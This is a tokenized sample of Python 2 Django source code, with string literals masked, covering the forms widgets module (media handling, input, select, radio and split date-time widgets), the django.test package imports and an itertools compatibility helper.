<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import copy <EOL> import datetime <EOL> from itertools import chain <EOL> from urlparse import urljoin <EOL> from django . conf import settings <EOL> from django . forms . util import flatatt , to_current_timezone <EOL> from django . utils . datastructures import MultiValueDict , MergeDict <EOL> from django . utils . html import escape , conditional_escape <EOL> from django . utils . translation import ugettext , ugettext_lazy <EOL> from django . utils . encoding import StrAndUnicode , force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import datetime_safe , formats <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Media ( StrAndUnicode ) : <EOL> def __init__ ( self , media = None , ** kwargs ) : <EOL> if media : <EOL> media_attrs = media . __dict__ <EOL> else : <EOL> media_attrs = kwargs <EOL> self . _css = { } <EOL> self . _js = [ ] <EOL> for name in MEDIA_TYPES : <EOL> getattr ( self , '<STR_LIT>' + name ) ( media_attrs . get ( name , None ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( chain ( * [ getattr ( self , '<STR_LIT>' + name ) ( ) for name in MEDIA_TYPES ] ) ) ) <EOL> def render_js ( self ) : <EOL> return [ u'<STR_LIT>' % self . absolute_path ( path ) for path in self . _js ] <EOL> def render_css ( self ) : <EOL> media = self . _css . keys ( ) <EOL> media . sort ( ) <EOL> return chain ( * [ <EOL> [ u'<STR_LIT>' % ( self . absolute_path ( path ) , medium ) <EOL> for path in self . _css [ medium ] ] <EOL> for medium in media ] ) <EOL> def absolute_path ( self , path , prefix = None ) : <EOL> if path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT:/>' ) : <EOL> return path <EOL> if prefix is None : <EOL> if settings . STATIC_URL is None : <EOL> prefix = settings . MEDIA_URL <EOL> else : <EOL> prefix = settings . STATIC_URL <EOL> return urljoin ( prefix , path ) <EOL> def __getitem__ ( self , name ) : <EOL> "<STR_LIT>" <EOL> if name in MEDIA_TYPES : <EOL> return Media ( ** { str ( name ) : getattr ( self , '<STR_LIT:_>' + name ) } ) <EOL> raise KeyError ( '<STR_LIT>' % name ) <EOL> def add_js ( self , data ) : <EOL> if data : <EOL> for path in data : <EOL> if path not in self . _js : <EOL> self . _js . append ( path ) <EOL> def add_css ( self , data ) : <EOL> if data : <EOL> for medium , paths in data . items ( ) : <EOL> for path in paths : <EOL> if not self . _css . get ( medium ) or path not in self . _css [ medium ] : <EOL> self . _css . setdefault ( medium , [ ] ) . append ( path ) <EOL> def __add__ ( self , other ) : <EOL> combined = Media ( ) <EOL> for name in MEDIA_TYPES : <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( self , '<STR_LIT:_>' + name , None ) ) <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( other , '<STR_LIT:_>' + name , None ) ) <EOL> return combined <EOL> def media_property ( cls ) : <EOL> def _media ( self ) : <EOL> if hasattr ( super ( cls , self ) , '<STR_LIT>' ) : <EOL> base = super ( cls , self ) . media <EOL> else : <EOL> base = Media ( ) <EOL> definition = getattr ( cls , '<STR_LIT>' , None ) <EOL> if definition : <EOL> extend = getattr ( definition , '<STR_LIT>' , True ) <EOL> if extend : <EOL> if extend == True : <EOL> m = base <EOL> else : <EOL> m = Media ( ) <EOL> for medium in extend : <EOL> m = m + base [ medium ] <EOL> return m + Media ( definition ) <EOL> else : <EOL> return Media ( definition ) <EOL> else : <EOL> return base <EOL> return property ( _media ) <EOL> class MediaDefiningClass ( type ) : <EOL> "<STR_LIT>" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( MediaDefiningClass , cls ) . __new__ ( cls , name , bases , <EOL> attrs ) <EOL> if '<STR_LIT>' not in attrs : <EOL> new_class . media = media_property ( new_class ) <EOL> return new_class <EOL> class SubWidget ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent_widget , name , value , attrs , choices ) : <EOL> self . parent_widget = parent_widget <EOL> self . name , self . value = name , value <EOL> self . attrs , self . choices = attrs , choices <EOL> def __unicode__ ( self ) : <EOL> args = [ self . name , self . value , self . attrs ] <EOL> if self . choices : <EOL> args . append ( self . choices ) <EOL> return self . parent_widget . render ( * args ) <EOL> class Widget ( object ) : <EOL> __metaclass__ = MediaDefiningClass <EOL> is_hidden = False <EOL> needs_multipart_form = False <EOL> is_localized = False <EOL> is_required = False <EOL> def __init__ ( self , attrs = None ) : <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = copy . copy ( self ) <EOL> obj . attrs = self . attrs . copy ( ) <EOL> memo [ id ( self ) ] = obj <EOL> return obj <EOL> def subwidgets ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> yield SubWidget ( self , name , value , attrs , choices ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def build_attrs ( self , extra_attrs = None , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> attrs = dict ( self . attrs , ** kwargs ) <EOL> if extra_attrs : <EOL> attrs . update ( extra_attrs ) <EOL> return attrs <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> """<STR_LIT>""" <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data_value = u'<STR_LIT>' <EOL> else : <EOL> data_value = data <EOL> if initial is None : <EOL> initial_value = u'<STR_LIT>' <EOL> else : <EOL> initial_value = initial <EOL> if force_unicode ( initial_value ) != force_unicode ( data_value ) : <EOL> return True <EOL> return False <EOL> def id_for_label ( self , id_ ) : <EOL> """<STR_LIT>""" <EOL> return id_ <EOL> class Input ( Widget ) : <EOL> """<STR_LIT>""" <EOL> input_type = None <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized : <EOL> return formats . localize_input ( value ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : <EOL> value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> if value != '<STR_LIT>' : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( self . _format_value ( value ) ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class TextInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> class PasswordInput ( Input ) : <EOL> input_type = '<STR_LIT:password>' <EOL> def __init__ ( self , attrs = None , render_value = False ) : <EOL> super ( PasswordInput , self ) . __init__ ( attrs ) <EOL> self . render_value = render_value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not self . render_value : value = None <EOL> return super ( PasswordInput , self ) . render ( name , value , attrs ) <EOL> class HiddenInput ( Input ) : <EOL> input_type = '<STR_LIT>' <EOL> is_hidden = True <EOL> class MultipleHiddenInput ( HiddenInput ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( MultipleHiddenInput , self ) . __init__ ( attrs ) <EOL> self . choices = choices <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> id_ = final_attrs . get ( '<STR_LIT:id>' , None ) <EOL> inputs = [ ] <EOL> for i , v in enumerate ( value ) : <EOL> input_attrs = dict ( value = force_unicode ( v ) , ** final_attrs ) <EOL> if id_ : <EOL> input_attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( id_ , i ) <EOL> inputs . append ( u'<STR_LIT>' % flatatt ( input_attrs ) ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( inputs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> class FileInput ( Input ) : <EOL> input_type = '<STR_LIT:file>' <EOL> needs_multipart_form = True <EOL> def render ( self , name , value , attrs = None ) : <EOL> return super ( FileInput , self ) . render ( name , None , attrs = attrs ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> "<STR_LIT>" <EOL> return files . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if data is None : <EOL> return False <EOL> return True <EOL> FILE_INPUT_CONTRADICTION = object ( ) <EOL> class ClearableFileInput ( FileInput ) : <EOL> initial_text = ugettext_lazy ( '<STR_LIT>' ) <EOL> input_text = ugettext_lazy ( '<STR_LIT>' ) <EOL> clear_checkbox_label = ugettext_lazy ( '<STR_LIT>' ) <EOL> template_with_initial = u'<STR_LIT>' <EOL> template_with_clear = u'<STR_LIT>' <EOL> def clear_checkbox_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return name + '<STR_LIT>' <EOL> def clear_checkbox_id ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return name + '<STR_LIT>' <EOL> def render ( self , name , value , attrs = None ) : <EOL> substitutions = { <EOL> '<STR_LIT>' : self . initial_text , <EOL> '<STR_LIT>' : self . input_text , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . clear_checkbox_label , <EOL> } <EOL> template = u'<STR_LIT>' <EOL> substitutions [ '<STR_LIT:input>' ] = super ( ClearableFileInput , self ) . render ( name , value , attrs ) <EOL> if value and hasattr ( value , "<STR_LIT:url>" ) : <EOL> template = self . template_with_initial <EOL> substitutions [ '<STR_LIT>' ] = ( u'<STR_LIT>' <EOL> % ( escape ( value . url ) , <EOL> escape ( force_unicode ( value ) ) ) ) <EOL> if not self . is_required : <EOL> checkbox_name = self . clear_checkbox_name ( name ) <EOL> checkbox_id = self . clear_checkbox_id ( checkbox_name ) <EOL> substitutions [ '<STR_LIT>' ] = conditional_escape ( checkbox_name ) <EOL> substitutions [ '<STR_LIT>' ] = conditional_escape ( checkbox_id ) <EOL> substitutions [ '<STR_LIT>' ] = CheckboxInput ( ) . render ( checkbox_name , False , attrs = { '<STR_LIT:id>' : checkbox_id } ) <EOL> substitutions [ '<STR_LIT>' ] = self . template_with_clear % substitutions <EOL> return mark_safe ( template % substitutions ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> upload = super ( ClearableFileInput , self ) . value_from_datadict ( data , files , name ) <EOL> if not self . is_required and CheckboxInput ( ) . value_from_datadict ( <EOL> data , files , self . clear_checkbox_name ( name ) ) : <EOL> if upload : <EOL> return FILE_INPUT_CONTRADICTION <EOL> return False <EOL> return upload <EOL> class Textarea ( Widget ) : <EOL> def __init__ ( self , attrs = None ) : <EOL> default_attrs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if attrs : <EOL> default_attrs . update ( attrs ) <EOL> super ( Textarea , self ) . __init__ ( default_attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> return mark_safe ( u'<STR_LIT>' % ( flatatt ( final_attrs ) , <EOL> conditional_escape ( force_unicode ( value ) ) ) ) <EOL> class DateInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_date ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) . date ( ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( DateInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class DateTimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateTimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_datetime ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( DateTimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class TimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( TimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) . time ( ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( TimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> def boolean_check ( v ) : <EOL> return not ( v is False or v is None or v == '<STR_LIT>' ) <EOL> class CheckboxInput ( Widget ) : <EOL> def __init__ ( self , attrs = None , check_test = None ) : <EOL> super ( CheckboxInput , self ) . __init__ ( attrs ) <EOL> self . check_test = boolean_check if check_test is None else check_test <EOL> def render ( self , name , value , attrs = None ) : <EOL> final_attrs = self . build_attrs ( attrs , type = '<STR_LIT>' , name = name ) <EOL> try : <EOL> result = self . check_test ( value ) <EOL> except : <EOL> result = False <EOL> if result : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not ( value is True or value is False or value is None or value == '<STR_LIT>' ) : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if name not in data : <EOL> return False <EOL> value = data . get ( name ) <EOL> values = { '<STR_LIT:true>' : True , '<STR_LIT:false>' : False } <EOL> if isinstance ( value , basestring ) : <EOL> value = values . get ( value . lower ( ) , value ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class Select ( Widget ) : <EOL> allow_multiple_selected = False <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( Select , self ) . __init__ ( attrs ) <EOL> self . choices = list ( choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , [ value ] ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def render_option ( self , selected_choices , option_value , option_label ) : <EOL> option_value = force_unicode ( option_value ) <EOL> if option_value in selected_choices : <EOL> selected_html = u'<STR_LIT>' <EOL> if not self . allow_multiple_selected : <EOL> selected_choices . remove ( option_value ) <EOL> else : <EOL> selected_html = '<STR_LIT>' <EOL> return u'<STR_LIT>' % ( <EOL> escape ( option_value ) , selected_html , <EOL> conditional_escape ( force_unicode ( option_label ) ) ) <EOL> def render_options ( self , choices , selected_choices ) : <EOL> selected_choices = set ( force_unicode ( v ) for v in selected_choices ) <EOL> output = [ ] <EOL> for option_value , option_label in chain ( self . choices , choices ) : <EOL> if isinstance ( option_label , ( list , tuple ) ) : <EOL> output . append ( u'<STR_LIT>' % escape ( force_unicode ( option_value ) ) ) <EOL> for option in option_label : <EOL> output . append ( self . render_option ( selected_choices , * option ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> else : <EOL> output . append ( self . render_option ( selected_choices , option_value , option_label ) ) <EOL> return u'<STR_LIT:\n>' . join ( output ) <EOL> class NullBooleanSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> choices = ( ( u'<STR_LIT:1>' , ugettext_lazy ( '<STR_LIT>' ) ) , <EOL> ( u'<STR_LIT:2>' , ugettext_lazy ( '<STR_LIT>' ) ) , <EOL> ( u'<STR_LIT:3>' , ugettext_lazy ( '<STR_LIT>' ) ) ) <EOL> super ( NullBooleanSelect , self ) . __init__ ( attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> try : <EOL> value = { True : u'<STR_LIT:2>' , False : u'<STR_LIT:3>' , u'<STR_LIT:2>' : u'<STR_LIT:2>' , u'<STR_LIT:3>' : u'<STR_LIT:3>' } [ value ] <EOL> except KeyError : <EOL> value = u'<STR_LIT:1>' <EOL> return super ( NullBooleanSelect , self ) . render ( name , value , attrs , choices ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> value = data . get ( name , None ) <EOL> return { u'<STR_LIT:2>' : True , <EOL> True : True , <EOL> '<STR_LIT:True>' : True , <EOL> u'<STR_LIT:3>' : False , <EOL> '<STR_LIT:False>' : False , <EOL> False : False } . get ( value , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is not None : <EOL> initial = bool ( initial ) <EOL> if data is not None : <EOL> data = bool ( data ) <EOL> return initial != data <EOL> class SelectMultiple ( Select ) : <EOL> allow_multiple_selected = True <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , value ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ ] <EOL> if data is None : <EOL> data = [ ] <EOL> if len ( initial ) != len ( data ) : <EOL> return True <EOL> initial_set = set ( [ force_unicode ( value ) for value in initial ] ) <EOL> data_set = set ( [ force_unicode ( value ) for value in data ] ) <EOL> return data_set != initial_set <EOL> class RadioInput ( SubWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choice , index ) : <EOL> self . name , self . value = name , value <EOL> self . attrs = attrs <EOL> self . choice_value = force_unicode ( choice [ <NUM_LIT:0> ] ) <EOL> self . choice_label = force_unicode ( choice [ <NUM_LIT:1> ] ) <EOL> self . index = index <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self , name = None , value = None , attrs = None , choices = ( ) ) : <EOL> name = name or self . name <EOL> value = value or self . value <EOL> attrs = attrs or self . attrs <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> label_for = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> choice_label = conditional_escape ( force_unicode ( self . choice_label ) ) <EOL> return mark_safe ( u'<STR_LIT>' % ( label_for , self . tag ( ) , choice_label ) ) <EOL> def is_checked ( self ) : <EOL> return self . value == self . choice_value <EOL> def tag ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> final_attrs = dict ( self . attrs , type = '<STR_LIT>' , name = self . name , value = self . choice_value ) <EOL> if self . is_checked ( ) : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class RadioFieldRenderer ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choices ) : <EOL> self . name , self . value , self . attrs = name , value , attrs <EOL> self . choices = choices <EOL> def __iter__ ( self ) : <EOL> for i , choice in enumerate ( self . choices ) : <EOL> yield RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , i ) <EOL> def __getitem__ ( self , idx ) : <EOL> choice = self . choices [ idx ] <EOL> return RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , idx ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:\n>' . join ( [ u'<STR_LIT>' <EOL> % force_unicode ( w ) for w in self ] ) ) <EOL> class RadioSelect ( Select ) : <EOL> renderer = RadioFieldRenderer <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> renderer = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if renderer : <EOL> self . renderer = renderer <EOL> super ( RadioSelect , self ) . __init__ ( * args , ** kwargs ) <EOL> def subwidgets ( self , name , value , attrs = None , choices = ( ) ) : <EOL> for widget in self . get_renderer ( name , value , attrs , choices ) : <EOL> yield widget <EOL> def get_renderer ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if value is None : value = '<STR_LIT>' <EOL> str_value = force_unicode ( value ) <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> choices = list ( chain ( self . choices , choices ) ) <EOL> return self . renderer ( name , str_value , final_attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> return self . get_renderer ( name , value , attrs , choices ) . render ( ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> class CheckboxSelectMultiple ( SelectMultiple ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> has_id = attrs and '<STR_LIT:id>' in attrs <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' ] <EOL> str_values = set ( [ force_unicode ( v ) for v in value ] ) <EOL> for i , ( option_value , option_label ) in enumerate ( chain ( self . choices , choices ) ) : <EOL> if has_id : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( attrs [ '<STR_LIT:id>' ] , i ) ) <EOL> label_for = u'<STR_LIT>' % final_attrs [ '<STR_LIT:id>' ] <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> cb = CheckboxInput ( final_attrs , check_test = lambda value : value in str_values ) <EOL> option_value = force_unicode ( option_value ) <EOL> rendered_cb = cb . render ( name , option_value ) <EOL> option_label = conditional_escape ( force_unicode ( option_label ) ) <EOL> output . append ( u'<STR_LIT>' % ( label_for , rendered_cb , option_label ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> class MultiWidget ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , widgets , attrs = None ) : <EOL> self . widgets = [ isinstance ( w , type ) and w ( ) or w for w in widgets ] <EOL> super ( MultiWidget , self ) . __init__ ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if self . is_localized : <EOL> for widget in self . widgets : <EOL> widget . is_localized = self . is_localized <EOL> if not isinstance ( value , list ) : <EOL> value = self . decompress ( value ) <EOL> output = [ ] <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> id_ = final_attrs . get ( '<STR_LIT:id>' , None ) <EOL> for i , widget in enumerate ( self . widgets ) : <EOL> try : <EOL> widget_value = value [ i ] <EOL> except IndexError : <EOL> widget_value = None <EOL> if id_ : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( id_ , i ) ) <EOL> output . append ( widget . render ( name + '<STR_LIT>' % i , widget_value , final_attrs ) ) <EOL> return mark_safe ( self . format_output ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> return [ widget . value_from_datadict ( data , files , name + '<STR_LIT>' % i ) for i , widget in enumerate ( self . widgets ) ] <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ u'<STR_LIT>' for x in range ( <NUM_LIT:0> , len ( data ) ) ] <EOL> else : <EOL> if not isinstance ( initial , list ) : <EOL> initial = self . decompress ( initial ) <EOL> for widget , initial , data in zip ( self . widgets , initial , data ) : <EOL> if widget . _has_changed ( initial , data ) : <EOL> return True <EOL> return False <EOL> def format_output ( self , rendered_widgets ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( rendered_widgets ) <EOL> def decompress ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _get_media ( self ) : <EOL> "<STR_LIT>" <EOL> media = Media ( ) <EOL> for w in self . widgets : <EOL> media = media + w . media <EOL> return media <EOL> media = property ( _get_media ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = super ( MultiWidget , self ) . __deepcopy__ ( memo ) <EOL> obj . widgets = copy . deepcopy ( self . widgets ) <EOL> return obj <EOL> class SplitDateTimeWidget ( MultiWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> widgets = ( DateInput ( attrs = attrs , format = date_format ) , <EOL> TimeInput ( attrs = attrs , format = time_format ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) <EOL> def decompress ( self , value ) : <EOL> if value : <EOL> value = to_current_timezone ( value ) <EOL> return [ value . date ( ) , value . time ( ) . replace ( microsecond = <NUM_LIT:0> ) ] <EOL> return [ None , None ] <EOL> class SplitHiddenDateTimeWidget ( SplitDateTimeWidget ) : <EOL> """<STR_LIT>""" <EOL> is_hidden = True <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> super ( SplitHiddenDateTimeWidget , self ) . __init__ ( attrs , date_format , time_format ) <EOL> for widget in self . widgets : <EOL> widget . input_type = '<STR_LIT>' <EOL> widget . is_hidden = True </s>
<s> """<STR_LIT>""" <EOL> from django . test . client import Client , RequestFactory <EOL> from django . test . testcases import ( TestCase , TransactionTestCase , <EOL> SimpleTestCase , LiveServerTestCase , skipIfDBFeature , <EOL> skipUnlessDBFeature ) <EOL> from django . test . utils import Approximate </s>
<s> """<STR_LIT>""" <EOL> import __builtin__ <EOL> import itertools <EOL> import warnings <EOL> def product ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> pools = map ( tuple , args ) * kwds . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> result = [ [ ] ] <EOL> for pool in pools : <EOL> result = [ x + [ y ] for x in result for y in pool ] <EOL> for prod in result : <EOL> yield tuple ( prod ) <EOL> if hasattr ( itertools , '<STR_LIT>' ) : <EOL> product = itertools . product <EOL> def is_iterable ( x ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> iter ( x ) <EOL> except TypeError : <EOL> return False <EOL> else : <EOL> return True <EOL> def all ( iterable ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> PendingDeprecationWarning ) <EOL> return __builtin__ . all ( iterable ) <EOL> def any ( iterable ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> PendingDeprecationWarning ) <EOL> return __builtin__ . any ( iterable ) </s>
